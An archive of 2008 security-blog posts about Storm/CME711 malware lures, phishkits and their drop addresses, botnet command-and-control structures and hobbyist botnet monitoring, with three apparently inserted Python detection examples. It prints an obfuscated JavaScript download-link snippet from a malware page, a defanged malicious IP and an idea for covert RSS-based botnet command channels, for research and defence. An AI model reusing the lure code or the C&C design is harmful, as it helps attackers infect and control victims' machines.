Tuesday, April 01, 2008

CME711 - April Fools

I'm a bit late posting this one - I've been working on some penetration testing projects and have been unable to monitor my honeypots.

For those who have not yet noticed:

(image captured by DISOG staff on 2008/03/31)

The 5-second refresh downloads funny.exe, clicking the image downloads kickme.exe, and the 'click here' link serves foolsday.exe; all three are the same file.


The email:

From: sauna@piraeusbank.co.yu
To: Me
Subject: Gotcha! April Fool!
Date: Mon, 31 Mar 2008
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

Doh! April's Fool. hxxp://69[dot]237[dot]180[dot]107


(obscuring done to protect the click-happy)

Drops a file in C:\WINDOWS\ called aromis.exe

Jose Nazario caught this one early on - check out his blog here.


I ran a quick query on my honeypot and found the following IPs serving the malicious site:



Monday, March 10, 2008

Excellent ISC diary entry

I really enjoyed reading a recent ISC diary entry by Maarten Van Horenbeeck.

It's very important for malware researchers and forensics folks to expand their focus when dealing with intrusion incidents, regardless of whether the attacker is white hat or black hat. The attacker knows you are watching, and they will try to hide in plain sight. This entry involves trickery on multiple fronts. If you don't have an expert group of penetration testers attack your network quarterly, an expert group of blackhat hackers might.

Stories like Maarten's help keep me interested in going to work every day.

I'd love to hear more stories like this one - if you'd like, please share them in the comments section.

Monday, March 03, 2008

CME711 - It's a howl!

Storm/CME711 is back to a 'funny greeting card' page.


(Note the "copyright error" in the image)

  • The file postcard.exe is offered by clicking on the image.
  • The file ecard.exe is offered when waiting 5 seconds.
  • The file e-card.exe is offered when clicking the 'click here' link.

Many people already watch for *card.exe with their IDS. I don't expect this to last long. Perhaps the next will be related to the anticipated U.S. Economic Stimulus Package --- or maybe Easter?

It appears this latest run drops the peers list to c:\windows\system32\diperto.ini.

A few MD5's for the binaries are:


Friday, February 29, 2008

RFI's and Phishing Tricks

Our honeypots have been hit with a rash of RFIs lately: we count over 1600 attempts from Feb 20 to Feb 29. Some of the most frequently attempted include URLs are listed below, with attempt counts.

These are likely automated crawlers, botnet stuff. We've seen attacks on honeypots that haven't been indexed in almost 6 months.

Thankfully most of these sites quickly removed the exploit code. There are still some that are live as of this post. A few of these RFI's are located on sites that have been compromised by attackers only hours earlier.

While following up on code like this, we spoke with a system administrator who asked to remain anonymous. He kindly offered system logs from a site that we identified as compromised. The site was serving a PayPal phish (and has since been taken offline).

In the logs were several attempts to download packages from enache.3x.ro. Some investigation revealed that this site held a number of phishing and exploit packages for both Windows and Unix. The site has been removed by the hosting provider, 3x.ro. Some of the binaries tripped the following AV signatures:
Backdoor.Linux.Phobi.A, Backdoor.Linux.Zorg.B, DOS.Linux.Blitz, Generic.Slapper.E69A1FF5, Generic.XPL.Samba.E2FFD420, Linux.RST.B, Trojan.Dos.Linux.Slice.B, Trojan.Exploit.Linux.Brk.C, Trojan.Exploit.Linux.Brk.D, Trojan.Exploit.Linux.Brk.E, Trojan.Exploit.Linux.Race.B, Trojan.Exploit.Linux.Race.C, Trojan.Flooder.Linux.Silly.B, Trojan.Flooder.Linux.Smurf.B, Trojan.Hacktool.Flood.A, Trojan.Hacktool.Linux.Bf.B, Trojan.Hacktool.Linux.Pscan.A, Trojan.Hacktool.Linux.Small.B, Trojan.Horse.(AV|BU|BY|CA|CB|CC|CE|CF|CI), Trojan.Linux.Hacktop.B, Trojan.Linux.Mircforce.B, Trojan.Linux.Rootkit.C, Trojan.Linux.Rootkit.N, Trojan.Linux.Rootkit.SA, Trojan.Rootkit.Linux.Agent.SH, Trojan.Rootkit.Linux.Agent.Y, Virtool.Linux.Shark.A, Virtool.Linux.Sshscan.A, Win32.Parite.B, Win32.Worm.Linux.Adore.A, Worm.Linux.Lion.A

In total there were over 80 packages on the site. Of those, 14 were phishkits:
  • Arsenal Credit Union (account information emailed to mefy12345@gmail.com)
  • E-Trade (account information emailed to giianny@yahoo.com)
  • PayPal (account information emailed to proces.verbal@yahoo.com or micumicu1@gmail.com)
  • Banca Intesa (account information emailed to muielagaborisilavoi@gmail.com)
  • Mid America Bank (account information emailed to varu2005@gmail.com or telefon.mobil@yahoo.com)
  • Poste Italiane (account information emailed to catalinum@yahoo.com)
  • First Interstate Bank (account information emailed to sbrns51@gmail.com)
  • Gesa Credit Union (account information emailed to mefy12345@gmail.com)
  • USF Federal Credit Union (account information emailed to mist3ry@evoreal.net and k0rd1t@yahoo.com)
  • Wachovia (account information emailed to telefon.mobil@yahoo.com or m3fystutzu@yahoo.com)
  • Capital One (account information emailed to hai.cu.spamu@gmail.com)
  • ICBA (account information emailed to mefy12345@gmail.com)
  • Oregon Community Credit Union (no email address assigned)
  • UCCU (account information emailed to proces.verbal@yahoo.com)

While none of these kits used it, we've noticed that the ED/pharmacy spam sites hitting our mailboxes are using a padlock icon as their favicon.ico and sporting "hacker safe" logos, a trick said to have been coined by L. Jean Camp.



This image plays on the advice IT people have given for years: watch for the padlock icon to identify secure sites.
I think we need to modify that advice: click the padlock icon, and verify who you're doing business with.
Who knows how many users this has fooled, and how many phishing sites have followed or will follow suit.


Saturday, February 23, 2008

Welcome to my homepage - CME711's latest run.

While checking my Stormworm/CME711/Peed/Peacomm/Zhelatin honeypot I noticed a recent page in German - which was roughly translated to English using an online translation utility:

Patrick homepage
Hello everyone!
Welcome to my home page

Short about me:

I have thought a lot, and now decided that normal relations with the woman I am with is not acceptable.
I am gay. My new life has changed a lot. I found a friend. The new sensation was the top and I do not
remember when I last felt so well. With my friend I spent the whole day, but then our love came to an end.

Now, I have only the soul of pain and memories. And now I will again find someone that I like,
with whom I spend my time and have sex too. The photo is a half year old (link:/album/IMG9481.exe)

I am unable to retrieve the binary - it appears the CME711 author(s) are still tweaking the page. The border of the page is an image, p.jpg. As soon as they finish updating I will post more details and a screenshot.

I suppose this could be loosely linked to the ED spam everyone is seeing in their email.


Sunday, February 03, 2008

Botnet Distributed Command and Control (DC&C)

Over the past four years we've seen a large number of law enforcement agencies, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented or new protocols, and distributed control structures. As law enforcement arrests more offenders, we see more of them using Tor, or their own botnets, to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large-scale botnets still exist today; however, the operators are wisely breaking these networks up into many smaller networks, or using peer-to-peer communication. Since the networks are spread out, it's harder to eliminate the threat posed by one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recently as two years ago, we started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, which perform the stated action. This provides the botnet operator a layer of protection. Now experienced researchers or law enforcement must find the smaller net to identify the botnet operator. This is time-consuming work, and without the cooperation of ISPs, it's hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than on one with fewer than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sell portions of his botnet. One chunk can be used for spam, while another may perform better in denial-of-service type activities.

Another example of a distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, which then pass it on to the individual peers.

Mapping peer-to-peer and other types of DC&C is still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I won't highlight how researchers are doing this mapping, simply because we need to weigh teaching the public (including bad guys) against keeping an ace up our sleeves. I'm hoping this post will spark many closed-door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain sight: using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of because of the mistakes its operators make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune: they disable outbound UDP.

The number of infected machines would increase dramatically if they used a connection model similar to Skype's.

So back to hiding in plain sight: what would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blog or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply HTTP requests returning XML, bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The request would look like legitimate RSS traffic, and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISP's.
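One defensive check that follows from the "hard to tell which visitors were bots" point, as an added example that is not code from the original post: scan web server logs for clients that fetch a comment feed on a near-constant interval. The feed path, the simplified log format and the client addresses are constructed assumptions.

```python
"""Triage clients that poll an RSS/comment feed on a fixed schedule, the
pattern the post describes for a bot fetching commands every 10-15 minutes.
Added example, not code from the original post. Log lines are constructed
in a simplified combined-log format with RFC 5737 documentation addresses."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, Iterable, List

# client, timestamp (timezone offset dropped), request path
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]\s]+)[^\]]*\] "GET (\S+) HTTP/1\.[01]" \d{3} \d+')
TIME_FMT = "%d/%b/%Y:%H:%M:%S"
FEED_PATH = "/comments/feed"   # hypothetical feed path, an assumption


def feed_requests_by_client(lines: Iterable[str],
                            feed_path: str = FEED_PATH) -> Dict[str, List[datetime]]:
    """Collect timestamps of every fetch of the feed, keyed by client address."""
    per_client: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a GET line we can parse
        ip, stamp, path = m.groups()
        if path == feed_path:
            per_client[ip].append(datetime.strptime(stamp, TIME_FMT))
    return per_client


def periodic_pollers(per_client: Dict[str, List[datetime]],
                     min_requests: int = 4, max_cv: float = 0.1) -> Dict[str, int]:
    """Return {client: mean interval in seconds} for clients whose gaps between
    feed fetches are almost constant (coefficient of variation <= max_cv).
    A scheduled bot polls like clockwork, but so does a legitimate aggregator,
    so this is a triage list: check the interval, the user agent and whether
    the client ever fetches anything but the feed before drawing conclusions."""
    flagged: Dict[str, int] = {}
    for ip, stamps in per_client.items():
        if len(stamps) < min_requests:
            continue
        ordered = sorted(stamps)
        gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            flagged[ip] = round(avg)
    return flagged


# Constructed sample log: 192.0.2.5 fetches the feed every 10 minutes exactly,
# 203.0.113.7 every hour (a typical reader), 198.51.100.9 browses irregularly.
SAMPLE_LOG = """\
192.0.2.5 - - [03/Feb/2008:10:00:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
198.51.100.9 - - [03/Feb/2008:10:02:13 -0500] "GET /comments/feed HTTP/1.1" 200 5120
198.51.100.9 - - [03/Feb/2008:10:03:40 -0500] "GET /comments/feed HTTP/1.1" 200 5120
192.0.2.5 - - [03/Feb/2008:10:10:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
192.0.2.5 - - [03/Feb/2008:10:12:00 -0500] "GET /index.html HTTP/1.1" 200 811
192.0.2.5 - - [03/Feb/2008:10:20:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
192.0.2.5 - - [03/Feb/2008:10:30:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
198.51.100.9 - - [03/Feb/2008:10:31:05 -0500] "GET /comments/feed HTTP/1.1" 200 5120
192.0.2.5 - - [03/Feb/2008:10:40:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
203.0.113.7 - - [03/Feb/2008:09:00:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
203.0.113.7 - - [03/Feb/2008:10:00:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
203.0.113.7 - - [03/Feb/2008:11:00:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
203.0.113.7 - - [03/Feb/2008:12:00:00 -0500] "GET /comments/feed HTTP/1.1" 200 5120
198.51.100.9 - - [03/Feb/2008:12:15:44 -0500] "GET /comments/feed HTTP/1.1" 200 5120
""".splitlines()


def flag_sample() -> Dict[str, int]:
    """Run the two steps over the constructed log."""
    return periodic_pollers(feed_requests_by_client(SAMPLE_LOG))


if __name__ == "__main__":
    for client, interval in flag_sample().items():
        print(f"{client} polls {FEED_PATH} every ~{interval}s")
```

Both the 10-minute and the hourly client are flagged; the interval and the rest of the client's traffic are what separate the two.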

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if it's recommended by your neighborhood computer genius (high school student), do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a sandbox for programs that access the internet. Sandboxie is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your PC off when not in use. Even if your machine is infected, the damage it can do is limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OS X has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).


Researching your own botnets

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, it's almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IPs of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISPs, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball, so be prepared to back up your accusations and statements with hard facts.

In some countries monitoring botnets is illegal; in others there has not yet been a ruling. Check your local laws before monitoring! Understand that you accept all risks. If you're not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxies to snoop on botnets. If you're too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxies means you're placing someone else at risk for denial-of-service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally, you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:


Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binary's command and control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.


Thursday, January 31, 2008

Infiltrator Botnet Monitor

Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"

New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off-the-shelf IRC clients, until they realize the bloat really isn't worth it and monitoring more than a dozen nets is practically impossible. Furthermore, monitoring custom IRCds with an RFC-compliant client will likely raise the suspicions of the botherder.

A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.

Paul has not had a chance to review the code yet and my Python is very weak, but I could not see anything too dangerous. Just remember this client will download URLs seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. It's missing documentation, but if you have a few minutes, give it a shot!


Wednesday, January 30, 2008

Pharmacy related sites - the work of CME711?

Over the last few months there have been a large number of domains registered for what appear to be pharmacy-related sites.

Many of the sites are using 5-minute TTLs with multiple A records.

Possibly related, Websense posted this today: http://www.websense.com/securitylabs/blog/blog.php?BlogID=170

Websense believes the spam they have seen is related to Storm/CME711. It's very likely that these domains are also related, but I'm stopping short of claiming that at this time.

~400 examples are:
These domains share many of the same A records, which is what caught my attention.
More information available as soon as I know more.
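The shared-A-record observation above is what a small clustering pass surfaces automatically. The following is an added example, not DISOG's code: it keeps only domains with a short TTL and several A records, then groups those that share addresses. The domain names are a few from the post's list; the TTLs and addresses are constructed placeholders from the RFC 5737 documentation ranges, not real resolutions.

```python
"""Group suspected fast-flux domains by low TTL and shared A records, the two
signals the post calls out. Added example, not DISOG's code. The domain names
are a handful from the post; TTLs and addresses are constructed sample data
(RFC 5737 documentation ranges), not real resolutions."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# domain -> (TTL in seconds, A records) as a resolver might return them
SAMPLE_ANSWERS: Dict[str, Tuple[int, List[str]]] = {
    "actand.com":      (300,   ["192.0.2.10", "198.51.100.7", "203.0.113.42"]),
    "agoeven.com":     (300,   ["198.51.100.7", "203.0.113.42", "192.0.2.88"]),
    "barhair.com":     (300,   ["192.0.2.10", "203.0.113.42"]),
    "medsalon.org":    (300,   ["192.0.2.88", "203.0.113.9"]),
    "example.org":     (86400, ["192.0.2.200"]),                     # long TTL, one A
    "cdn.example.net": (60,    ["198.51.100.50", "198.51.100.51"]),  # low TTL, disjoint IPs
}

LOW_TTL_SECONDS = 600   # the post's domains used 5-minute TTLs
MIN_A_RECORDS = 2


def is_flux_candidate(ttl: int, a_records: List[str]) -> bool:
    """A short TTL together with several A records is the flux signal."""
    return ttl <= LOW_TTL_SECONDS and len(set(a_records)) >= MIN_A_RECORDS


def flux_clusters(answers: Dict[str, Tuple[int, List[str]]]) -> List[Set[str]]:
    """Cluster candidate domains transitively: two domains land in one cluster
    when they share at least one A record, directly or through other domains."""
    candidates = {d: set(a) for d, (ttl, a) in answers.items()
                  if is_flux_candidate(ttl, a)}
    ip_to_domains: Dict[str, Set[str]] = defaultdict(set)
    for domain, ips in candidates.items():
        for ip in ips:
            ip_to_domains[ip].add(domain)
    clusters: List[Set[str]] = []
    seen: Set[str] = set()
    for start in candidates:
        if start in seen:
            continue
        group: Set[str] = set()
        stack = [start]
        while stack:                      # depth-first walk over shared IPs
            cur = stack.pop()
            if cur in group:
                continue
            group.add(cur)
            for ip in candidates[cur]:
                stack.extend(ip_to_domains[ip] - group)
        seen |= group
        clusters.append(group)
    return clusters


def shared_infrastructure(answers: Dict[str, Tuple[int, List[str]]],
                          min_size: int = 2) -> List[List[str]]:
    """Only clusters of several domains on the same addresses are interesting;
    a lone low-TTL name with a few A records is what a CDN looks like."""
    return [sorted(c) for c in flux_clusters(answers) if len(c) >= min_size]


if __name__ == "__main__":
    for group in shared_infrastructure(SAMPLE_ANSWERS):
        print("shared A records:", ", ".join(group))
```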


Tuesday, January 15, 2008

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IPs in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click here to launch the download
and then press Run


The link is generated by JavaScript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That JavaScript translates to withlove.exe. Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your Snort signatures.
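Decoding strings like that one by hand is error-prone, so here is an added helper (not code from the original post) that applies unescape()'s rules to every document.write(unescape('...')) call in a saved page and lists the href targets the decoded markup would inject. The sample page is a constructed reconstruction around the exact percent-encoded string quoted above.

```python
"""Decode document.write(unescape('...')) calls in a saved page and list the
download links they inject. Added example, not from the original post. The
sample page is constructed around the percent-encoded string quoted above."""
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import unquote

WRITE_RE = re.compile(
    r"document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\)", re.IGNORECASE)


def js_unescape(encoded: str) -> str:
    """Mimic JavaScript's unescape(): %uXXXX is a UTF-16 code unit and %XX a
    Latin-1 byte. urllib's unquote only knows %XX, so handle %u first."""
    step = re.sub(r"%u([0-9A-Fa-f]{4})",
                  lambda m: chr(int(m.group(1), 16)), encoded)
    return unquote(step, encoding="latin-1")


class HrefCollector(HTMLParser):
    """Collects href values from <a> tags in whatever markup is fed to it."""
    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def decoded_writes(page_source: str) -> List[str]:
    """Markup each obfuscated document.write() would emit, in page order."""
    return [js_unescape(s) for s in WRITE_RE.findall(page_source)]


def injected_links(page_source: str) -> List[str]:
    """href targets of anchors created by the obfuscated writes."""
    collector = HrefCollector()
    for chunk in decoded_writes(page_source):
        collector.feed(chunk)
    collector.close()
    return collector.hrefs


# Constructed sample page; the encoded string is the one quoted in the post.
SAMPLE_PAGE = """<html><body>
<p>Your download should begin shortly. If your download does not start
in 10-20 seconds, you can
<script>document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );</script>click here</a>
to launch the download and then press Run</p>
</body></html>"""

if __name__ == "__main__":
    for raw in decoded_writes(SAMPLE_PAGE):
        print("decoded:", repr(raw))
    print("injected links:", injected_links(SAMPLE_PAGE))
```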

Additionally we're tracking a phish using Stormworm fast-flux nodes with the domain ibank-halifax.com.
